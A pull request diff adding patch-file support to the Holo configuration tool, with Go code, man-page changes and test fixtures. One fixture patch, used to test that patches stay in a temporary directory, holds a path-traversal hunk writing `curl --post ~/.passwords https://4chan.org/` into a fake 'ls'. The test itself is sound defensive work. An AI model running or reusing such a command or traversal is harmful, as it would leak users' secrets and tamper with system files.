### PR TITLE
holo-files: Support patch files (#5)

### DIFF
--- a/cmd/holo-files/internal/impl/resource.go
+++ b/cmd/holo-files/internal/impl/resource.go
@@ -72,15 +72,21 @@ func (resource rawResource) EntityPath() string    { return resource.entityPath 
 func NewResource(path string) Resource {
 	relPath, _ := filepath.Rel(common.ResourceDirectory(), path)
 	segments := strings.SplitN(relPath, string(filepath.Separator), 2)
+	ext := filepath.Ext(segments[1])
 	raw := rawResource{
 		path:          path,
 		disambiguator: segments[0],
-		entityPath:    strings.TrimSuffix(segments[1], ".holoscript"),
+		entityPath:    strings.TrimSuffix(segments[1], ext),
 	}
-	if strings.HasSuffix(raw.path, ".holoscript") {
+	switch ext {
+	case ".holoscript":
 		return Holoscript{raw}
+	case ".patch":
+		return Patchfile{raw}
+	default:
+		raw.entityPath += ext
+		return StaticResource{raw}
 	}
-	return StaticResource{raw}
 }
 
 //Resources holds a slice of Resource instances, and implements some methods

--- a/cmd/holo-files/internal/impl/resource_patch.go
+++ b/cmd/holo-files/internal/impl/resource_patch.go
@@ -1,0 +1,111 @@
+/*******************************************************************************
+*
+* Copyright 2017-2018 Luke Shumaker <lukeshu@parabola.nu>
+*
+* This file is part of Holo.
+*
+* Holo is free software: you can redistribute it and/or modify it under the
+* terms of the GNU General Public License as published by the Free Software
+* Foundation, either version 3 of the License, or (at your option) any later
+* version.
+*
+* Holo is distributed in the hope that it will be useful, but WITHOUT ANY
+* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
+* A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along with
+* Holo. If not, see <http://www.gnu.org/licenses/>.
+*
+*******************************************************************************/
+
+package impl
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+
+	"github.com/holocm/holo/cmd/holo-files/internal/common"
+)
+
+// Patchfile is a Resource that is a `patch(1)` file that edits the
+// current version of the entity.
+type Patchfile struct{ rawResource }
+
+// ApplicationStrategy implements the Resource interface.
+func (resource Patchfile) ApplicationStrategy() string { return "patch" }
+
+// DiscardsPreviousBuffer implements the Resource interface.
+func (resource Patchfile) DiscardsPreviousBuffer() bool { return false }
+
+// ApplyTo implements the Resource interface.
+func (resource Patchfile) ApplyTo(entityBuffer common.FileBuffer) (common.FileBuffer, error) {
+	// `patch` requires that the file it's operating on be a real
+	// file (not a pipe).  So, we'll write entityBuffer to a
+	// temporary file, run `patch`, then read it back.
+
+	// We really only normally need 1 temporary file, but:
+	//  1. since common.FileBuffer.Write removes the file and then
+	//     re-creates it, that's a bit racy
+	//  2. The only way to limit patch to operating on a single
+	//     file is to name that file on the command line, but
+	//     doing that prevents it from unlinking the file, which
+	//     prevents type changes.
+	//
+	// Using a temporary directory lets us easily work around both
+	// of these issues.  Unfortunately, this allows the patch to
+	// create new files other than the one for the entity we are
+	// applying.  However, it can't escape the temporary
+	// directory, so we'll just "allow" that, and document that we
+	// ignore those files.
+	targetDir, err := ioutil.TempDir(os.Getenv("HOLO_CACHE_DIR"), "patch-target.")
+	if err != nil {
+		return common.FileBuffer{}, err
+	}
+	defer os.RemoveAll(targetDir)
+	targetPath := filepath.Join(targetDir, filepath.Base(entityBuffer.Path))
+
+	// Write entityBuffer to the temporary file
+	err = entityBuffer.Write(targetPath)
+	if err != nil {
+		return common.FileBuffer{}, err
+	}
+
+	// Run `patch` on the temporary file
+	patchfile, err := filepath.Abs(resource.Path())
+	if err != nil {
+		return common.FileBuffer{}, err
+	}
+	cmd := exec.Command("patch",
+		"-N",
+		"-i", patchfile,
+	)
+	cmd.Dir = targetDir
+	cmd.Stdout = os.Stderr
+	cmd.Stderr = os.Stderr
+	err = cmd.Run()
+	if err != nil {
+		return common.FileBuffer{}, fmt.Errorf("execution failed: %s: %s", strings.Join(cmd.Args, " "), err.Error())
+	}
+
+	// Read the result back
+	//
+	// Allow `patch` to override everything but the filepath:
+	//  - file type (changable with git-style "deleted file
+	//    mode"/"new file mode" lines, which are implemented by at
+	//    least GNU patch, if not in strict POSIX mode)
+	//  - file permissions (changable with git-style "new mode"
+	//    lines, which are implemented by at least GNU patch)
+	//  - UID/GID (I don't know of a patch syntax that does this,
+	//    but maybe it will exist in the future)
+	//  - contents (obviously)
+	targetBuffer, err := common.NewFileBuffer(targetPath)
+	if err != nil {
+		return common.FileBuffer{}, err
+	}
+	targetBuffer.Path = entityBuffer.Path
+	return targetBuffer, nil
+}

--- a/cmd/holo-files/internal/impl/resource_script.go
+++ b/cmd/holo-files/internal/impl/resource_script.go
@@ -1,0 +1,68 @@
+/*******************************************************************************
+*
+* Copyright 2015 Stefan Majewsky <majewsky@gmx.net>
+* Copyright 2017 Luke Shumaker <lukeshu@parabola.nu>
+*
+* This file is part of Holo.
+*
+* Holo is free software: you can redistribute it and/or modify it under the
+* terms of the GNU General Public License as published by the Free Software
+* Foundation, either version 3 of the License, or (at your option) any later
+* version.
+*
+* Holo is distributed in the hope that it will be useful, but WITHOUT ANY
+* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
+* A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along with
+* Holo. If not, see <http://www.gnu.org/licenses/>.
+*
+*******************************************************************************/
+
+package impl
+
+import (
+	"bytes"
+	"fmt"
+	"os"
+	"os/exec"
+	"strings"
+
+	"github.com/holocm/holo/cmd/holo-files/internal/common"
+)
+
+// Holoscript is a Resource that is a script that edits the current
+// version of the entity.
+type Holoscript struct{ rawResource }
+
+// ApplicationStrategy implements the Resource interface.
+func (resource Holoscript) ApplicationStrategy() string { return "passthru" }
+
+// DiscardsPreviousBuffer implements the Resource interface.
+func (resource Holoscript) DiscardsPreviousBuffer() bool { return false }
+
+// ApplyTo implements the Resource interface.
+func (resource Holoscript) ApplyTo(entityBuffer common.FileBuffer) (common.FileBuffer, error) {
+	//application of a holoscript requires file contents
+	entityBuffer, err := entityBuffer.ResolveSymlink()
+	if err != nil {
+		return common.FileBuffer{}, err
+	}
+
+	//run command, fetch result file into buffer (not into the entity
+	//directly, in order not to corrupt the file there if the script run fails)
+	var stdout bytes.Buffer
+	cmd := exec.Command(resource.Path())
+	cmd.Stdin = strings.NewReader(entityBuffer.Contents)
+	cmd.Stdout = &stdout
+	cmd.Stderr = os.Stderr
+	err = cmd.Run()
+	if err != nil {
+		return common.FileBuffer{}, fmt.Errorf("execution of %s failed: %s", resource.Path(), err.Error())
+	}
+
+	//result is the stdout of the script
+	entityBuffer.Mode &^= os.ModeType
+	entityBuffer.Contents = stdout.String()
+	return entityBuffer, nil
+}

--- a/cmd/holo-files/internal/impl/resource_static.go
+++ b/cmd/holo-files/internal/impl/resource_static.go
@@ -1,0 +1,55 @@
+/*******************************************************************************
+*
+* Copyright 2015 Stefan Majewsky <majewsky@gmx.net>
+* Copyright 2017 Luke Shumaker <lukeshu@parabola.nu>
+*
+* This file is part of Holo.
+*
+* Holo is free software: you can redistribute it and/or modify it under the
+* terms of the GNU General Public License as published by the Free Software
+* Foundation, either version 3 of the License, or (at your option) any later
+* version.
+*
+* Holo is distributed in the hope that it will be useful, but WITHOUT ANY
+* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
+* A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along with
+* Holo. If not, see <http://www.gnu.org/licenses/>.
+*
+*******************************************************************************/
+
+package impl
+
+import (
+	"os"
+
+	"github.com/holocm/holo/cmd/holo-files/internal/common"
+)
+
+// StaticResource is a Resource that is a plain static file that
+// replaces the current version of the entity.
+type StaticResource struct{ rawResource }
+
+// ApplicationStrategy implements the Resource interface.
+func (resource StaticResource) ApplicationStrategy() string { return "apply" }
+
+// DiscardsPreviousBuffer implements the Resource interface.
+func (resource StaticResource) DiscardsPreviousBuffer() bool { return true }
+
+// ApplyTo implements the Resource interface.
+func (resource StaticResource) ApplyTo(entityBuffer common.FileBuffer) (common.FileBuffer, error) {
+	resourceBuffer, err := common.NewFileBuffer(resource.Path())
+	if err != nil {
+		return common.FileBuffer{}, err
+	}
+	entityBuffer.Contents = resourceBuffer.Contents
+	entityBuffer.Mode = (entityBuffer.Mode &^ os.ModeType) | (resourceBuffer.Mode & os.ModeType)
+
+	//since Linux disregards mode flags on symlinks and always reports 0777 perms,
+	//normalize the mode thusly to make FileBuffer.EqualTo() work reliably
+	if entityBuffer.Mode&os.ModeSymlink != 0 {
+		entityBuffer.Mode = os.ModeSymlink | os.ModePerm
+	}
+	return entityBuffer, nil
+}

--- a/doc/holo-files.8.pod
+++ b/doc/holo-files.8.pod
@@ -66,12 +66,25 @@ default configuration for L<pacman(8)>, but enables the "Color" and
       passthru /usr/share/holo/files/20-enable-color/etc/pacman.conf.holoscript
 
 This allows the file contents to be modified; however, the file permissions and
-ownership are not changed, and are inherited from the target base.
+ownership are not changed, and are inherited from the target base or the
+previous resource application step.
+
+=item C<.patch> The resource file is understood to be a patch file that can be
+fed to the L<patch(1)> program.  Some patch formats have the ability to change
+file type and file permissions; this is respected, making this is the only
+resource format that can change file permissions.
+
+The filename to modify is not passed to L<patch(1)>; instead, a copy of the
+target is available as the only file in the directory passed to the C<-d> flag.
+This means that the filename used within the patch file must have the same
+basename as the entity being operated on.  Any other files that the patch file
+may create are ignored.
 
 =item Otherwise, the resource file is a plain file or symlink that will just
 overwrite the contents of the target base (and all previous resource application
 steps).  The ownership and file permissions are not set from the resource file,
-and are inherited from the target base.
+and are inherited from the target base or the previous resource application
+step.
 
 =back
 

--- a/doc/holo-files.8.pod
+++ b/doc/holo-files.8.pod
@@ -40,14 +40,20 @@ Resource files are applied on the B<target base>, the initial version of the
 target file that was found during the first C<holo apply> run. This target base
 is saved at F</var/lib/holo/files/base/$target>.
 
-Resource files that are plain files or symlinks will just overwrite the target
-base (or all previous entries), whereas executable resource files with an extra
-C<.holoscript> suffix can be used to modify the target base (or the result of a
-previous application step). The target contents will be piped through the
-script. This is typically used when the default configuration for an
-application shall be used, but with some minor modifications. The following
-example uses the default configuration for L<pacman(8)>, but enables the
-"Color" and "TotalDownload" options:
+How resource files are applied to the target depends on each resource's file
+extension:
+
+=over 4
+
+=item C<.holoscript> The resource file is understood to be an executable program
+that can be used to modify the target. The target contents (either the original
+target base, or the result of a previous resource application) will be piped
+through the holoscript program.
+
+This is typically used when the default configuration for an application shall
+be used, but with some minor modifications.  The following example uses the
+default configuration for L<pacman(8)>, but enables the "Color" and
+"TotalDownload" options:
 
     $ cat /usr/share/holo/files/20-enable-color/etc/pacman.conf.holoscript
     #!/bin/sh
@@ -59,10 +65,19 @@ example uses the default configuration for L<pacman(8)>, but enables the
       store at /var/lib/holo/files/base/etc/pacman.conf
       passthru /usr/share/holo/files/20-enable-color/etc/pacman.conf.holoscript
 
-When writing the new target file, ownership and permissions will be copied from
-the target base, and thus from the original target file. Furthermore, a copy of
-the provisioned target file is written to
-F</var/lib/holo/files/provisioned/$target> for use by C<holo diff file:$target>.
+This allows the file contents to be modified; however, the file permissions and
+ownership are not changed, and are inherited from the target base.
+
+=item Otherwise, the resource file is a plain file or symlink that will just
+overwrite the contents of the target base (and all previous resource application
+steps).  The ownership and file permissions are not set from the resource file,
+and are inherited from the target base.
+
+=back
+
+When writing the new target file, a copy of the provisioned target file is
+written to F</var/lib/holo/files/provisioned/$target> for use by C<holo diff
+file:$target>.
 
 In normal operation, holo-files will refuse to operate on a target file that
 has been modified or deleted by the user or by another program. Apply

--- a/test/files/17-patches/expected-apply-output
+++ b/test/files/17-patches/expected-apply-output
@@ -1,0 +1,43 @@
+
+Working on file:/etc/symlink
+  store at target/var/lib/holo/files/base/etc/symlink
+     patch target/usr/share/holo/files/17-patches/etc/symlink.patch
+
+patching symbolic link symlink
+
+Working on file:/etc/symlink-to-plain
+  store at target/var/lib/holo/files/base/etc/symlink-to-plain
+     patch target/usr/share/holo/files/17-patches/etc/symlink-to-plain.patch
+
+patching symbolic link symlink-to-plain
+patching file symlink-to-plain
+
+Working on file:/etc/txtfile
+  store at target/var/lib/holo/files/base/etc/txtfile
+     patch target/usr/share/holo/files/17-patches/etc/txtfile.patch
+
+patching file txtfile
+
+Working on file:/etc/txtfile-to-symlink
+  store at target/var/lib/holo/files/base/etc/txtfile-to-symlink
+     patch target/usr/share/holo/files/17-patches/etc/txtfile-to-symlink.patch
+
+patching file txtfile-to-symlink
+patching symbolic link txtfile-to-symlink
+
+Working on file:/etc/txtfile-with-fuzz
+  store at target/var/lib/holo/files/base/etc/txtfile-with-fuzz
+     patch target/usr/share/holo/files/17-patches/etc/txtfile-with-fuzz.patch
+
+patching file txtfile-with-fuzz
+Hunk #1 succeeded at 1 with fuzz 1.
+
+Working on file:/etc/txtfile-with-garbage
+  store at target/var/lib/holo/files/base/etc/txtfile-with-garbage
+     patch target/usr/share/holo/files/17-patches/etc/txtfile-with-garbage.patch
+
+patching file txtfile-with-garbage
+patching file garbage
+patching file ls
+
+exit status 0

--- a/test/files/17-patches/expected-diff-output
+++ b/test/files/17-patches/expected-diff-output
@@ -1,0 +1,59 @@
+diff --holo target/var/lib/holo/files/provisioned/etc/symlink target/etc/symlink
+new file mode 120000
+--- /dev/null
++++ target/etc/symlink
+@@ -0,0 +1 @@
++txtfile
+\ No newline at end of file
+diff --holo target/var/lib/holo/files/provisioned/etc/symlink-to-plain target/etc/symlink-to-plain
+new file mode 120000
+--- /dev/null
++++ target/etc/symlink-to-plain
+@@ -0,0 +1 @@
++txtfile
+\ No newline at end of file
+diff --holo target/var/lib/holo/files/provisioned/etc/txtfile target/etc/txtfile
+new file mode 100644
+--- /dev/null
++++ target/etc/txtfile
+@@ -0,0 +1,6 @@
++foo
++foo
++foo
++baz
++bar
++bar
+diff --holo target/var/lib/holo/files/provisioned/etc/txtfile-to-symlink target/etc/txtfile-to-symlink
+new file mode 100644
+--- /dev/null
++++ target/etc/txtfile-to-symlink
+@@ -0,0 +1,6 @@
++foo
++foo
++foo
++baz
++bar
++bar
+diff --holo target/var/lib/holo/files/provisioned/etc/txtfile-with-fuzz target/etc/txtfile-with-fuzz
+new file mode 100644
+--- /dev/null
++++ target/etc/txtfile-with-fuzz
+@@ -0,0 +1,6 @@
++foo
++foo
++foo
++baz
++bar
++bar
+diff --holo target/var/lib/holo/files/provisioned/etc/txtfile-with-garbage target/etc/txtfile-with-garbage
+new file mode 100644
+--- /dev/null
++++ target/etc/txtfile-with-garbage
+@@ -0,0 +1,6 @@
++foo
++foo
++foo
++baz
++bar
++bar
+exit status 0

--- a/test/files/17-patches/expected-scan-output
+++ b/test/files/17-patches/expected-scan-output
@@ -1,0 +1,26 @@
+
+file:/etc/symlink
+    store at target/var/lib/holo/files/base/etc/symlink
+       patch target/usr/share/holo/files/17-patches/etc/symlink.patch
+
+file:/etc/symlink-to-plain
+    store at target/var/lib/holo/files/base/etc/symlink-to-plain
+       patch target/usr/share/holo/files/17-patches/etc/symlink-to-plain.patch
+
+file:/etc/txtfile
+    store at target/var/lib/holo/files/base/etc/txtfile
+       patch target/usr/share/holo/files/17-patches/etc/txtfile.patch
+
+file:/etc/txtfile-to-symlink
+    store at target/var/lib/holo/files/base/etc/txtfile-to-symlink
+       patch target/usr/share/holo/files/17-patches/etc/txtfile-to-symlink.patch
+
+file:/etc/txtfile-with-fuzz
+    store at target/var/lib/holo/files/base/etc/txtfile-with-fuzz
+       patch target/usr/share/holo/files/17-patches/etc/txtfile-with-fuzz.patch
+
+file:/etc/txtfile-with-garbage
+    store at target/var/lib/holo/files/base/etc/txtfile-with-garbage
+       patch target/usr/share/holo/files/17-patches/etc/txtfile-with-garbage.patch
+
+exit status 0

--- a/test/files/17-patches/expected-tree
+++ b/test/files/17-patches/expected-tree
@@ -1,0 +1,216 @@
+symlink   0777 ./etc/holorc
+../../../holorc
+----------------------------------------
+file      0644 ./etc/os-release
+ID=unittest
+----------------------------------------
+symlink   0777 ./etc/symlink
+txtfile-with-fuzz
+----------------------------------------
+file      0644 ./etc/symlink-to-plain
+foo
+foo
+foo
+bar
+----------------------------------------
+file      0755 ./etc/txtfile
+foo
+foo
+foo
+bar
+----------------------------------------
+symlink   0777 ./etc/txtfile-to-symlink
+txtfile
+----------------------------------------
+file      0644 ./etc/txtfile-with-fuzz
+foo
+foo
+foo
+bar
+----------------------------------------
+file      0644 ./etc/txtfile-with-garbage
+foo
+foo
+foo
+bar
+----------------------------------------
+directory 0755 ./run/
+----------------------------------------
+directory 0755 ./tmp/
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/symlink-to-plain.patch
+diff --git a/symlink-to-plain b/symlink-to-plain
+deleted file mode 120000
+index d2eecfe..0000000
+--- a/symlink-to-plain
++++ /dev/null
+@@ -1 +0,0 @@
+-txtfile
+\ No newline at end of file
+diff --git a/symlink-to-plain b/symlink-to-plain
+new file mode 100644
+index 0000000..dacb3b9
+--- /dev/null
++++ b/symlink-to-plain
+@@ -0,0 +1,4 @@
++foo
++foo
++foo
++bar
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/symlink.patch
+diff --git a/symlink b/symlink
+index 1a010b1..30d67d4 120000
+--- a/symlink
++++ b/symlink
+@@ -1 +1 @@
+-txtfile
+\ No newline at end of file
++txtfile-with-fuzz
+\ No newline at end of file
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile-to-symlink.patch
+diff --git a/txtfile-to-symlink b/txtfile-to-symlink
+deleted file mode 100644
+index efbe4b6..0000000
+--- a/txtfile-to-symlink
++++ /dev/null
+@@ -1,6 +0,0 @@
+-foo
+-foo
+-foo
+-baz
+-bar
+-bar
+diff --git a/txtfile-to-symlink b/txtfile-to-symlink
+new file mode 120000
+index 0000000..d2eecfe
+--- /dev/null
++++ b/txtfile-to-symlink
+@@ -0,0 +1 @@
++txtfile
+\ No newline at end of file
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile-with-fuzz.patch
+diff --git a/txtfile-with-fuzz b/txtfile-with-fuzz
+index efbe4b6..dacb3b9 100644
+--- a/txtfile-with-fuzz
++++ b/txtfile-with-fuzz
+@@ -1,6 +1,4 @@
+ fuzz
+ foo
+ foo
+-baz
+-bar
+ bar
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile-with-garbage.patch
+diff --git some/funny/nested/subdir/txtfile-with-garbage a/different/directory/txtfile-with-garbage
+index efbe4b6..dacb3b9 100644
+--- some/funny/nested/subdir/txtfile-with-garbage
++++ a/different/directory/txtfile-with-garbage
+@@ -1,6 +1,4 @@
+ foo
+ foo
+ foo
+-baz
+-bar
+ bar
+diff --git a/garbage b/garbage
+new file mode 100644
+index 0000000..07360e3
+--- /dev/null
++++ b/garbage
+@@ -0,0 +1 @@
++zap
+diff --git ../bin/ihack/you/ls  ../bin/ihack/you/ls
+new file mode 100644
+index 0000000..07360e3
+--- ../bin/ihack/you/ls
++++ ../bin/ihack/you/ls
+@@ -0,0 +1 @@
++curl --post ~/.passwords https://4chan.org/
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile.patch
+diff --git a/txtfile b/txtfile
+old mode 100644
+new mode 100755
+index efbe4b6..dacb3b9
+--- a/txtfile
++++ b/txtfile
+@@ -1,6 +1,4 @@
+ foo
+ foo
+ foo
+-baz
+-bar
+ bar
+----------------------------------------
+symlink   0777 ./var/lib/holo/files/base/etc/symlink
+txtfile
+----------------------------------------
+symlink   0777 ./var/lib/holo/files/base/etc/symlink-to-plain
+txtfile
+----------------------------------------
+file      0644 ./var/lib/holo/files/base/etc/txtfile
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+file      0644 ./var/lib/holo/files/base/etc/txtfile-to-symlink
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+file      0644 ./var/lib/holo/files/base/etc/txtfile-with-fuzz
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+file      0644 ./var/lib/holo/files/base/etc/txtfile-with-garbage
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+symlink   0777 ./var/lib/holo/files/provisioned/etc/symlink
+txtfile-with-fuzz
+----------------------------------------
+file      0644 ./var/lib/holo/files/provisioned/etc/symlink-to-plain
+foo
+foo
+foo
+bar
+----------------------------------------
+file      0755 ./var/lib/holo/files/provisioned/etc/txtfile
+foo
+foo
+foo
+bar
+----------------------------------------
+symlink   0777 ./var/lib/holo/files/provisioned/etc/txtfile-to-symlink
+txtfile
+----------------------------------------
+file      0644 ./var/lib/holo/files/provisioned/etc/txtfile-with-fuzz
+foo
+foo
+foo
+bar
+----------------------------------------
+file      0644 ./var/lib/holo/files/provisioned/etc/txtfile-with-garbage
+foo
+foo
+foo
+bar
+----------------------------------------

--- a/test/files/17-patches/source-tree
+++ b/test/files/17-patches/source-tree
@@ -1,0 +1,152 @@
+symlink   0777 ./etc/holorc
+../../../holorc
+----------------------------------------
+file      0644 ./etc/os-release
+ID=unittest
+----------------------------------------
+symlink   0777 ./etc/symlink
+txtfile
+----------------------------------------
+symlink   0777 ./etc/symlink-to-plain
+txtfile
+----------------------------------------
+file      0644 ./etc/txtfile
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+file      0644 ./etc/txtfile-to-symlink
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+file      0644 ./etc/txtfile-with-fuzz
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+file      0644 ./etc/txtfile-with-garbage
+foo
+foo
+foo
+baz
+bar
+bar
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/symlink-to-plain.patch
+diff --git a/symlink-to-plain b/symlink-to-plain
+deleted file mode 120000
+index d2eecfe..0000000
+--- a/symlink-to-plain
++++ /dev/null
+@@ -1 +0,0 @@
+-txtfile
+\ No newline at end of file
+diff --git a/symlink-to-plain b/symlink-to-plain
+new file mode 100644
+index 0000000..dacb3b9
+--- /dev/null
++++ b/symlink-to-plain
+@@ -0,0 +1,4 @@
++foo
++foo
++foo
++bar
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/symlink.patch
+diff --git a/symlink b/symlink
+index 1a010b1..30d67d4 120000
+--- a/symlink
++++ b/symlink
+@@ -1 +1 @@
+-txtfile
+\ No newline at end of file
++txtfile-with-fuzz
+\ No newline at end of file
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile-to-symlink.patch
+diff --git a/txtfile-to-symlink b/txtfile-to-symlink
+deleted file mode 100644
+index efbe4b6..0000000
+--- a/txtfile-to-symlink
++++ /dev/null
+@@ -1,6 +0,0 @@
+-foo
+-foo
+-foo
+-baz
+-bar
+-bar
+diff --git a/txtfile-to-symlink b/txtfile-to-symlink
+new file mode 120000
+index 0000000..d2eecfe
+--- /dev/null
++++ b/txtfile-to-symlink
+@@ -0,0 +1 @@
++txtfile
+\ No newline at end of file
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile-with-fuzz.patch
+diff --git a/txtfile-with-fuzz b/txtfile-with-fuzz
+index efbe4b6..dacb3b9 100644
+--- a/txtfile-with-fuzz
++++ b/txtfile-with-fuzz
+@@ -1,6 +1,4 @@
+ fuzz
+ foo
+ foo
+-baz
+-bar
+ bar
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile-with-garbage.patch
+diff --git some/funny/nested/subdir/txtfile-with-garbage a/different/directory/txtfile-with-garbage
+index efbe4b6..dacb3b9 100644
+--- some/funny/nested/subdir/txtfile-with-garbage
++++ a/different/directory/txtfile-with-garbage
+@@ -1,6 +1,4 @@
+ foo
+ foo
+ foo
+-baz
+-bar
+ bar
+diff --git a/garbage b/garbage
+new file mode 100644
+index 0000000..07360e3
+--- /dev/null
++++ b/garbage
+@@ -0,0 +1 @@
++zap
+diff --git ../bin/ihack/you/ls  ../bin/ihack/you/ls
+new file mode 100644
+index 0000000..07360e3
+--- ../bin/ihack/you/ls
++++ ../bin/ihack/you/ls
+@@ -0,0 +1 @@
++curl --post ~/.passwords https://4chan.org/
+----------------------------------------
+file      0644 ./usr/share/holo/files/17-patches/etc/txtfile.patch
+diff --git a/txtfile b/txtfile
+old mode 100644
+new mode 100755
+index efbe4b6..dacb3b9
+--- a/txtfile
++++ b/txtfile
+@@ -1,6 +1,4 @@
+ foo
+ foo
+ foo
+-baz
+-bar
+ bar
+----------------------------------------

--- a/util/dump-to-tree.sh
+++ b/util/dump-to-tree.sh
@@ -40,7 +40,7 @@ while read_and_inc FILE_TYPE FILE_MODE FILE_PATH; do
     file)
       install -D -m "${FILE_MODE}" /dev/null "${FILE_PATH}"
       # header is followed by file content, terminated by a separator line like "---------------"
-      while IFS='' read_and_inc_or_fail LINE; do
+      while IFS='' read_and_inc_or_fail -r LINE; do
         if [[ "${LINE}" =~ ^-+$ ]]; then
           break
         fi


### PR DESCRIPTION
Creating a Pull Request for this one, since it definitely needs reviewed.

I'm fairly confident that the included tests will only pass with GNU patch; different patch implementations have too much freedom in how they format their informative output to be able to do verbatim checks portably.  Additionally, the tests check that we implement it in such a way that various extensions (git-style changing of file permissions or file type) are able to run--but this means we're also checking for the presence of those extensions in the system's patch implementation.  I know that BusyBox patch does not implement them.

`patch` is called in an directory that is empty except for the input file it will be operating on, and is given `-N -i /absolute/path/to/file.patch` as arguments.  This means that it will apply any segments in the patch file that match the basename of the file being operated on.  The patch could create other files, but it can't escape the temporary working directory, and any other files it creates will be ignored (this handles both `.orig` files created by fuzzy patches, as well as other files created by misbehaving patches).

I think that the clean-ups in all but the last 2 commits (which actually implement patch support) are maybe worth while independently of the patch support itself.